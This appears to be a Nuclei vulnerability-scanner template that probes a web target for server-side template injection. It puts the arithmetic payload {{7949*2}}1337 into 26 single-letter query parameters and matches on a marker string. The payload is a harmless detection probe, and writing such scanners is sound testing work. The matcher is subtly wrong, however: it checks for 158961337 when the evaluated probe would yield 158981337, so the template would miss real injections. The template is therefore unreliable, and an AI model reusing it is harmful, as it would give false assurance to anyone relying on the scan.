id: ssti-alphabet

info:
  name: SSTI alphabet
  author: osamahamad
  severity: medium
  description: SSTI via alphabet params
  tags: ssti

requests:
  - method: GET
    path:
      - '{{BaseURL}}//?a={{7949*2}}1337&b={{7949*2}}1337&c={{7949*2}}1337&d={{7949*2}}1337&e={{7949*2}}1337&f={{7949*2}}1337&g={{7949*2}}1337&h={{7949*2}}1337&i={{7949*2}}1337&j={{7949*2}}1337&k={{7949*2}}1337&l={{7949*2}}1337&m={{7949*2}}1337&n={{7949*2}}1337&o={{7949*2}}1337&p={{7949*2}}1337&q={{7949*2}}1337&r={{7949*2}}1337&s={{7949*2}}1337&t={{7949*2}}1337&u={{7949*2}}1337&v={{7949*2}}1337&w={{7949*2}}1337&x={{7949*2}}1337&y={{7949*2}}1337&z={{7949*2}}1337'
    
    matchers-condition: and
    matchers:

      - type: word
        words:
          - '158961337'
        part: body
